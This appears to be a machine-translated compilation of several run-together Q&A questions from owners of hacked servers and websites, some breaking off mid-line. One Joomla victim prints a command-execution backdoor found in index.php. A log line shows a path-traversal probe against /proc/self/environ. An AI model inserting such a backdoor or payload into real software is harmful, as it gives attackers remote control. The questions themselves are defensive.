正如标题所示,我们有一个使用第三方 smtp 凭据发送电子邮件的网站,但是,我们的 smtp 凭据不断被黑客攻击并用于发送垃圾邮件,这导致我们的 smtp 帐户被暂停,我们首先使用 ses,并且然后想到我们需要添加spf,dkim和dmarc,添加后,我们转移到sendgrid,再次被黑客攻击,队友认为这是因为访问sendgrid的弱密码,但我不这么认为,因为密码测试说它很强大,需要 2000 年才能破解,我们并不真正知道问题所在,我们的网站使用 Laravel 7,黑客如何访问 .env 文件?
请帮助。
我使用 Netgear 无线路由器,并连接了各种无线设备。我的其中一台无线设备不支持 WPA2 安全性,因此我不得不将路由器上的安全性降级为 WEP。
我们都知道 WEP 已损坏,因此作为一项附加措施,我在路由器上启用了无线访问列表,以便只有在我的访问列表中具有指定 MAC 地址的设备才能连接到路由器。
我知道为了访问像这样的安全网络,可以从设备中欺骗 MAC 地址。但这容易吗?使用 WEP 和无线访问列表是否足以防止大多数黑客攻击?或者我应该尽我所能确保将来所有设备都支持 WPA2?
我在服务器的日志中看到一个 IP 反复尝试以 sa 的身份登录到我的 SQL Server。ip 是:75.145.243.233 它解析回 5-145-243-233-richmond-va.hfc.comcastbusiness.net。
有没有办法从康卡斯特那里找出谁拥有这个盒子?
我意识到这个问题的答案会有所不同,这就是我问它的原因。如果您之前遭受过 DDoS 攻击 - 它持续了多长时间?
只是想知道我们必须继续进行这场战斗多长时间(现在持续几个星期)。
我醒来发现我的共享网络主机中具有 777 权限的所有文件夹都有两个新的 php 文件。无法读取文件中的代码 - 这是解码版本:http : //pastie.org/779226(这是什么......?)该代码甚至被注入到一些 PHP 文件中。
我不知道有人会怎么做?我知道拥有 777 权限并不是最聪明的事情,但是他们最初是如何进入我的文件夹系统的。
我只是一个客户端程序员,如果我有一些关于如何防止将来发生这种情况的建议,那就太好了。
干杯。
我正在运行的一个 Joomla 网站前几天被黑了。黑客将一些文件放入 tmp 目录,并以某种方式在那里运行 HTTP 守护程序(至少我的主机是这么告诉我的)。无论如何,我一直在努力清理他们留下的文件并尽可能保护我的安全,但在检查我的日志时,我注意到www.domain.com/?cmd=ls. 这对我来说似乎很奇怪,所以我尝试了它...... 瞧,它列出了我网站根目录中的所有文件。有人可以向我解释为什么会发生这种情况以及我如何阻止它吗?这似乎是一个巨大的漏洞,我想立即消除它。
更新:在挖掘过程中,我注意到在 Joomla index.php 中添加了一些额外的行:
if ($_GET['cmd']!=null) {
system($_GET['cmd']);
}
我已经删除了这些,但很想知道攻击者是如何设法编辑这些的。不太确定在哪里查看以确保我关闭了任何后门。
更多更新:首先让我说是的,我意识到这里正确的行动方案是炸毁网站并从备份中恢复。但是我更愿意把它作为最后的手段,因为 (a) 它是一个依赖社区贡献的网站,而且我的备份不是最近的(我的错,我知道)和 (b) 我正在开发一个新的应该很快准备好的版本。但是因为我似乎在这里得到了一些帮助,所以我将添加一些我发现/做的其他事情,以试图解决这种情况。
在我的 /tmp 文件夹中找到了一些 .kin(或类似的东西 - 没有记下它并立即将其删除)目录,这显然是运行这个 http 守护程序的地方。我假设 gunzip(如下所述)是如何放置在这里的。
在我的 error_log 文件中,我发现了以下可疑条目(“...”是我试图从这篇文章中删除路径/文件名):
[04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in ... on line 24
[05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in ... on line 92
[04-Jul-2010 06:41:52] PHP Warning: rmdir(...) [<a href='function.rmdir'>function.rmdir</a>]: Directory not empty in ... on line …使用 netstat -na 我注意到我有很多像
tcp 0 0 XXX.XXX.XXX.XXX:25 YYY.YYY.YYY.YYY:13933 ESTABLISHED
tcp 0 0 XXX.XXX.XXX.XXX:25 ZZZ.ZZZ.ZZZ.ZZZ:9528 ESTABLISHED
尽管我的服务器位于英国,但这些地址是美国、巴西等。
这可能是一些“非法”活动,比如垃圾邮件之类的吗?
[root@myserver ~]# tcpdump port 25
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
20:54:33.842388 IP g224057157.adsl.remotehost1.de.23970 > XXX.XXX.XXX.XXX.smtp: S 3343584823:3343584823(0) win 8192 <mss 1360,nop,wscale 2,nop,nop,sackOK>
20:54:33.842431 IP XXX.XXX.XXX.XXX.smtp > g224057157.adsl.remotehost1.de.23970: S 583530268:583530268(0) ack 3343584824 win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 7>
20:54:33.904660 IP g224057157.adsl.remotehost1.de.23970 > XXX.XXX.XXX.XXX.smtp: . ack 1 win …我在 Bluehost 共享托管环境中托管了许多 wordpress 站点。最近,当我在 Google 中搜索其中一个网站时,它说“该网站可能已被入侵”。
我收到了来自 Google 网站管理员的关于其中一个 WP 站点中的脚本的警报。当我检查这些站点时,我在页脚中发现了一些链接,提到"myteenmovies.net"了另一个站点。Whois 信息显示,它们是俄罗斯网站。
我还发现了其他一些名字很奇怪的 PHP 文件wxwz.php,xypz.php等等...... PHP 代码是用eval(gununcompress(base64_decode()))类似的方式加密的。还有一个文件有一个注释“#Web Shell by orb”。
我知道黑客可以完全访问我的服务器(使用 Webshell 脚本)。所有的网站都很老(大约一年),Wordpress 2.5。权限是755。谁能猜猜或建议,黑客是如何上传文件的?FTP/SSH/Cpanel 密码非常强大。还有其他方法吗?
我的网站被利用了(不用担心如何利用),结果是在不同位置安装了多个 WebShell。确切的 web shell 就像在 StackOverflow 上的这个问题中列出的那个一样。
显然,我删除了 shell 文件,并尽我所能解决了这个漏洞。与此同时,我在我站点的错误日志中发现了一个 IP 地址,试图访问该 shell 文件。IP 来自安大略省滑铁卢市的 Rogers Cable IP 地址。这似乎是一个住宅IP。
那么,除了阻止 IP 之外,我还能用它做什么吗?向罗杰斯报告——他们会相信我,会不会打扰?是否有可能它只是一台僵尸计算机代理真正攻击者的请求?
我的 MySQL 数据库被黑了,我找不到漏洞。我在 PHP 中有可靠的保护以防止注入,黑客本人已经与我沟通并说他不是通过注入进行黑客攻击。
如果没有注入,我还有哪些其他方式会被黑客入侵?我知道他不知道我的数据库密码,我没有受到 DDOS 攻击,第三,我的网站上没有黑客想要的个人信息,所以我认为黑客说的是实话。
那么如何在不注入的情况下篡改 MySQL 数据库呢?